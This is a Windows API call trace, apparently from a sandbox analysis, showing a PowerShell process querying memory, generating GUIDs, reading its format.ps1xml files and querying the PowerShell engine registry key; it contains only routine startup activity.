	[0592.169] VirtualQuery (in: lpAddress=0x28c0a0, lpBuffer=0x28cf60, dwLength=0x30 | out: lpBuffer=0x28cf60*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.171] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x555b8e1e, Data2=0xf74, Data3=0x4eec, Data4=([0]=0xa5, [1]=0xf8, [2]=0xb6, [3]=0xa3, [4]=0x4e, [5]=0x89, [6]=0x9f, [7]=0xfe))) returned 0x0
	[0593.697] VirtualQuery (in: lpAddress=0x28c360, lpBuffer=0x28d220, dwLength=0x30 | out: lpBuffer=0x28d220*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0593.698] VirtualQuery (in: lpAddress=0x28c180, lpBuffer=0x28d040, dwLength=0x30 | out: lpBuffer=0x28d040*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0593.699] VirtualQuery (in: lpAddress=0x28b9d0, lpBuffer=0x28c890, dwLength=0x30 | out: lpBuffer=0x28c890*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0593.700] VirtualQuery (in: lpAddress=0x28b9d0, lpBuffer=0x28c890, dwLength=0x30 | out: lpBuffer=0x28c890*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0593.701] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x5c6ecd5, Data2=0x676b, Data3=0x4b1e, Data4=([0]=0xa9, [1]=0xad, [2]=0x30, [3]=0xfd, [4]=0x2d, [5]=0x1e, [6]=0x7e, [7]=0x76))) returned 0x0
	[0593.701] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x593db1ef, Data2=0x8a0d, Data3=0x4267, Data4=([0]=0x81, [1]=0x11, [2]=0x1d, [3]=0x30, [4]=0xbb, [5]=0x6a, [6]=0x8f, [7]=0xd8))) returned 0x0
	[0593.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.702] SetErrorMode (uMode=0x1) returned 0x1
	[0593.702] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0593.703] GetFileType (hFile=0x310) returned 0x1
	[0593.703] SetErrorMode (uMode=0x1) returned 0x1
	[0593.703] GetFileType (hFile=0x310) returned 0x1
	[0593.703] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.703] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.703] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.703] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.703] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.704] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.704] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.704] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.705] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.705] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.705] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.705] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.706] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.706] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.706] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.706] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.708] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0593.708] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0xbce, lpOverlapped=0x0) returned 1
	[0593.708] ReadFile (in: hFile=0x310, lpBuffer=0x33918ee, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33918ee*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0593.709] ReadFile (in: hFile=0x310, lpBuffer=0x33921b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x33921b8*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0593.709] CloseHandle (hObject=0x310) returned 1
	[0593.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.709] SetErrorMode (uMode=0x1) returned 0x1
	[0593.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0593.709] SetErrorMode (uMode=0x1) returned 0x1
	[0593.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.710] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x310) returned 0x0
	[0593.710] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0593.710] CoTaskMemAlloc (cb=0x5a) returned 0x49b830
	[0593.710] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x49b830, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0593.710] CoTaskMemFree (pv=0x49b830) 
	[0593.710] RegCloseKey (hKey=0x310) returned 0x0
	[0593.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.711] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x7dbd78e1, Data2=0xa1c7, Data3=0x4c94, Data4=([0]=0x96, [1]=0xc6, [2]=0x2e, [3]=0xad, [4]=0x67, [5]=0x1b, [6]=0xb8, [7]=0xfa))) returned 0x0
	[0593.712] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xaedc706d, Data2=0xa4e8, Data3=0x4942, Data4=([0]=0xa2, [1]=0x60, [2]=0x67, [3]=0x71, [4]=0x15, [5]=0xd2, [6]=0x1a, [7]=0xc9))) returned 0x0
	[0593.713] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xefb984f9, Data2=0x4bfd, Data3=0x453d, Data4=([0]=0x89, [1]=0x96, [2]=0x5b, [3]=0x9f, [4]=0xf2, [5]=0x86, [6]=0x68, [7]=0x97))) returned 0x0
	[0593.713] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x34e3b0f4, Data2=0xc629, Data3=0x4ee9, Data4=([0]=0xb8, [1]=0xf7, [2]=0x81, [3]=0xb6, [4]=0x63, [5]=0xf3, [6]=0x5e, [7]=0x71))) returned 0x0
	[0593.714] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x6ada93f2, Data2=0x5fc, Data3=0x4407, Data4=([0]=0xab, [1]=0x11, [2]=0x1e, [3]=0xdd, [4]=0xc6, [5]=0xbd, [6]=0x72, [7]=0xff))) returned 0x0
	[0593.714] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa59b63e4, Data2=0x3b6d, Data3=0x49c0, Data4=([0]=0x8e, [1]=0xdc, [2]=0x6a, [3]=0x4c, [4]=0x4e, [5]=0x8e, [6]=0x5e, [7]=0xc2))) returned 0x0
	[0593.714] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x6ed0aac0, Data2=0xc48f, Data3=0x461d, Data4=([0]=0x85, [1]=0xfb, [2]=0x94, [3]=0xe7, [4]=0x45, [5]=0xc4, [6]=0xd7, [7]=0x60))) returned 0x0
	[0593.715] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe4a5e33, Data2=0xecca, Data3=0x4c41, Data4=([0]=0x83, [1]=0xf9, [2]=0xad, [3]=0x45, [4]=0xdf, [5]=0x55, [6]=0x6a, [7]=0xd7))) returned 0x0
	[0593.715] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x90d02c82, Data2=0xddac, Data3=0x4e41, Data4=([0]=0xa7, [1]=0x51, [2]=0xde, [3]=0x31, [4]=0x9, [5]=0x5d, [6]=0xbd, [7]=0x71))) returned 0x0
	[0593.715] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe703e440, Data2=0x6428, Data3=0x4b8f, Data4=([0]=0x9f, [1]=0xea, [2]=0x36, [3]=0xd, [4]=0x7f, [5]=0xa7, [6]=0x81, [7]=0xe2))) returned 0x0
	[0593.715] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x3ccb643e, Data2=0x4d06, Data3=0x41be, Data4=([0]=0x8d, [1]=0xb5, [2]=0x52, [3]=0xee, [4]=0xf1, [5]=0xb4, [6]=0x9, [7]=0x4d))) returned 0x0
	[0593.715] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xfec592aa, Data2=0xa54d, Data3=0x429f, Data4=([0]=0x99, [1]=0x65, [2]=0x34, [3]=0x32, [4]=0x6, [5]=0x8d, [6]=0x7e, [7]=0x62))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x334d1273, Data2=0x3645, Data3=0x4974, Data4=([0]=0xb3, [1]=0x2a, [2]=0x47, [3]=0x9c, [4]=0xdf, [5]=0x9d, [6]=0xd0, [7]=0xd4))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdf0bb5fe, Data2=0x25a8, Data3=0x487b, Data4=([0]=0x91, [1]=0x7, [2]=0x5e, [3]=0x23, [4]=0x69, [5]=0x5d, [6]=0xa7, [7]=0x9b))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xf8e0e0ec, Data2=0x1a7a, Data3=0x43a3, Data4=([0]=0x8f, [1]=0x51, [2]=0x98, [3]=0x31, [4]=0x18, [5]=0xef, [6]=0x81, [7]=0x81))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x85ab9a3f, Data2=0x922f, Data3=0x4634, Data4=([0]=0x85, [1]=0x92, [2]=0x23, [3]=0xa6, [4]=0xc6, [5]=0x40, [6]=0x25, [7]=0xcd))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xbf650761, Data2=0xb991, Data3=0x4457, Data4=([0]=0x8f, [1]=0xe1, [2]=0xb7, [3]=0x6e, [4]=0x54, [5]=0x32, [6]=0xc3, [7]=0x1e))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x4ca431da, Data2=0x3cff, Data3=0x44f8, Data4=([0]=0xba, [1]=0x5, [2]=0x98, [3]=0x5, [4]=0xea, [5]=0x57, [6]=0xde, [7]=0x17))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdd7628b7, Data2=0x29a4, Data3=0x4d30, Data4=([0]=0xb8, [1]=0x93, [2]=0x70, [3]=0xb9, [4]=0x8e, [5]=0x58, [6]=0x5f, [7]=0x7))) returned 0x0
	[0593.716] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xffe15d62, Data2=0x49fd, Data3=0x42fe, Data4=([0]=0xa2, [1]=0xd6, [2]=0x76, [3]=0xb2, [4]=0x25, [5]=0xb2, [6]=0x5f, [7]=0x6d))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x36f999d, Data2=0x2dce, Data3=0x4e0a, Data4=([0]=0x9f, [1]=0x19, [2]=0x7e, [3]=0xb9, [4]=0xee, [5]=0x84, [6]=0x4e, [7]=0x6))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe4a4784c, Data2=0x9e13, Data3=0x4969, Data4=([0]=0x85, [1]=0x39, [2]=0xf8, [3]=0x5d, [4]=0xd1, [5]=0x91, [6]=0xe, [7]=0xc7))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xddcf5fd8, Data2=0x62b2, Data3=0x46c6, Data4=([0]=0x8a, [1]=0xd, [2]=0xb8, [3]=0xff, [4]=0xc4, [5]=0xdd, [6]=0xdd, [7]=0x30))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x5ba56a0b, Data2=0xb061, Data3=0x4610, Data4=([0]=0xa1, [1]=0xd5, [2]=0x8c, [3]=0x88, [4]=0x36, [5]=0x31, [6]=0xc4, [7]=0xff))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xfae0de5a, Data2=0x2dd8, Data3=0x455c, Data4=([0]=0xbe, [1]=0x49, [2]=0xfc, [3]=0xe3, [4]=0x2, [5]=0xcb, [6]=0x1b, [7]=0x54))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x79639f60, Data2=0x8233, Data3=0x404f, Data4=([0]=0x93, [1]=0xc9, [2]=0xbe, [3]=0x6, [4]=0x90, [5]=0xd8, [6]=0x44, [7]=0x6a))) returned 0x0
	[0593.717] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa69faa3f, Data2=0x3c8e, Data3=0x4c9e, Data4=([0]=0x8a, [1]=0xc, [2]=0x4f, [3]=0xd8, [4]=0x96, [5]=0x75, [6]=0xb7, [7]=0xbf))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x5a809457, Data2=0xd500, Data3=0x4278, Data4=([0]=0xbc, [1]=0xe6, [2]=0xff, [3]=0xf1, [4]=0x32, [5]=0x8b, [6]=0xe8, [7]=0x28))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x5e0b9158, Data2=0x8b80, Data3=0x46f7, Data4=([0]=0x95, [1]=0xd5, [2]=0x1d, [3]=0x82, [4]=0xaa, [5]=0xb, [6]=0x39, [7]=0x20))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x55b3023c, Data2=0x92cb, Data3=0x4bde, Data4=([0]=0x8b, [1]=0xad, [2]=0xda, [3]=0x97, [4]=0x9, [5]=0xd8, [6]=0xac, [7]=0xb4))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x95b73a12, Data2=0x73ed, Data3=0x436e, Data4=([0]=0x9e, [1]=0xea, [2]=0x6d, [3]=0xf, [4]=0x2c, [5]=0x7a, [6]=0xd0, [7]=0xa0))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x9fac7190, Data2=0x9e2f, Data3=0x4fb2, Data4=([0]=0xa2, [1]=0xd8, [2]=0x71, [3]=0x87, [4]=0x10, [5]=0xf8, [6]=0x8e, [7]=0x80))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe08f2417, Data2=0x3089, Data3=0x4793, Data4=([0]=0x96, [1]=0x31, [2]=0x47, [3]=0x45, [4]=0xe9, [5]=0x84, [6]=0x7a, [7]=0x1e))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xc0457259, Data2=0x6a96, Data3=0x4a57, Data4=([0]=0xbd, [1]=0x42, [2]=0x84, [3]=0x5, [4]=0xf3, [5]=0xa2, [6]=0x50, [7]=0x5e))) returned 0x0
	[0593.718] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x49f40f79, Data2=0xbafc, Data3=0x4f3b, Data4=([0]=0x91, [1]=0xd2, [2]=0x98, [3]=0xbd, [4]=0x97, [5]=0x6a, [6]=0x5f, [7]=0xcd))) returned 0x0
	[0593.719] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xcefd3144, Data2=0xb9d1, Data3=0x484a, Data4=([0]=0x80, [1]=0x3d, [2]=0x6, [3]=0x6a, [4]=0xf6, [5]=0x8f, [6]=0x16, [7]=0xd))) returned 0x0
	[0593.719] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa7b7534a, Data2=0x604c, Data3=0x447a, Data4=([0]=0x82, [1]=0xb2, [2]=0xa1, [3]=0x1c, [4]=0xfe, [5]=0xc8, [6]=0xd8, [7]=0x86))) returned 0x0
	[0593.719] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0593.720] GetFileType (hFile=0x310) returned 0x1
	[0593.720] SetErrorMode (uMode=0x1) returned 0x1
	[0593.720] GetFileType (hFile=0x310) returned 0x1
	[0593.720] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0595.562] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0597.079] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.901] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.902] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.902] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.902] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x119, lpOverlapped=0x0) returned 1
	[0599.902] ReadFile (in: hFile=0x310, lpBuffer=0x34a29b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34a29b8*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0599.902] CloseHandle (hObject=0x310) returned 1
	[0599.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.903] SetErrorMode (uMode=0x1) returned 0x1
	[0599.903] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0599.903] SetErrorMode (uMode=0x1) returned 0x1
	[0599.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.903] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x310) returned 0x0
	[0599.905] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0599.905] CoTaskMemAlloc (cb=0x5a) returned 0x49b830
